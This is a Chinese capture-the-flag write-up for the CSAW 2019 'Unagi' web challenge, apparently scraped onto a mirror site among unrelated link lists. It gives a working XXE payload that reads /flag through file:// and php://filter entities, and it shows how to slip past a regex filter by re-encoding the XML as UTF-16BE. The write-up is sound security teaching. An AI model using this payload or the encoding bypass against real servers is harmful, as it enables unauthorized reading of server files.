当前位置: 首页 > news >正文

seo排名整站优化莱州网站建设

seo排名整站优化,莱州网站建设,网站开发怎么确定价格,wordpress 显示文章固定链接[CSAWQual 2019]Web_Unagi 1 解题流程1.1 分析1.2 解题 2 思考总结 1 解题流程 这篇博客讲了xml进行编码转换绕过的原理:https://www.shawroot.cc/156.html 1.1 分析 页面可以上传,上传一句话php失败,点击示例发现是xml格式,那…

[CSAWQual 2019]Web_Unagi

  • 1 解题流程
    • 1.1 分析
    • 1.2 解题
  • 2 思考总结

1

1 解题流程

这篇博客讲了xml进行编码转换绕过的原理:https://www.shawroot.cc/156.html

1.1 分析

  1. 页面可以上传,上传一句话php失败,点击示例发现是xml格式,那么就是XXE注入了
    2
  2. 点击about得到flag位置: Flag is located at /flag, come get it

1.2 解题

  1. 编写XXE注入文件,以xml结尾
    <?xml version='1.0'?>
    <!DOCTYPE users [
    <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag" >]>
    或
    <!ENTITY xxe SYSTEM "file:///flag" >]>
    <users><user><username>bob</username><password>passwd2</password><name>Bob</name><email>bob@fakesite.com</email>  <group>CSAW2019</group><intro>&xxe;</intro></user>
    </users>
    
  2. 尝试上传,发现还是被拦截了,这时候可以查询如何绕过WAF
    xml文档不仅可以用UTF-8编码,也可以用UTF-16、UTF-32和EBCDIC编码。
    在这些编码的帮助下,使用正则表达式可以很容易地绕过WAF,因为在这种类型的WAF中,正则表达式通常仅配置为单字符集。
    在linux中使用命令将xml转换为16进制
    cat 1.xml | iconv -f UTF-8 -t UTF-16BE > x16.xml
  3. 上传即可获取flag
    flag{5325a120-326c-4829-8778-22c54362a7b4}

2 思考总结

编写xml注意点:
1、属性名大小写要区分
2、flag很长,放在其他属性中只能输出部分,而intro意为introduce个人简介,可以输出长内容

http://www.yayakq.cn/news/582886/

相关文章:

  • 网站建设一般需要多少钱潍坊在线制作网站
  • 网站空间怎样设置用户名和密码nas怎么做网站服务器
  • 大连企业网站排名做民宿要给网站多少合同钱
  • 用c 做毕业设计的音乐网站vps服务器怎么做网站
  • 如何提高网站百度权重丽水市做网站的
  • 建站不备案哪个外贸网站开发客户比较好用
  • 有哪些炫酷的官方网站专门做特价的网站
  • 律师网站建设方案2023年第三波新冠9月
  • 绿色网站配色wordpress 糗事百科
  • 网站建设岗位任职资格公司网站建设需要的材料
  • 北京 网站建设公司比分网站建设
  • 常州网站建设外包公司ios个人开发者账号多少钱
  • 网站的收录哪个网站可以做相册
  • 医院网站建设的宗旨加强红色网站建设
  • 泉州网站建设网站制作建设网站建议
  • 玄武模板网站制作报价网站建设属于什么开票类目
  • 捷信做单官方网站建站之星网站空间根目录
  • 毕设电商网站设计建筑工程网络图分为
  • 佛山三水区有没有网站建设公司注册公司查名字哪个网站
  • 分类信息的网站排名怎么做北京it外包公司
  • 网站营销的分类有哪些经典vi设计案例分析
  • 邯山专业做网站小程序可以做网站吗
  • 东莞企业网站教程珠海单位网站建设
  • 河北做网站哪家公司好html5的网站
  • 购买域名后如何建立网站拉丝机东莞网站建设
  • 打折网站模板诸城网站建设诸城
  • 深圳罗湖网站建设公司哪家好专业外贸网站建设_诚信_青岛
  • 网页与网站设计说明wordpress 登录弹窗
  • 网站企业建设公司排名专业设计公司vi设计
  • 衡水网站seo钢材公司网站建设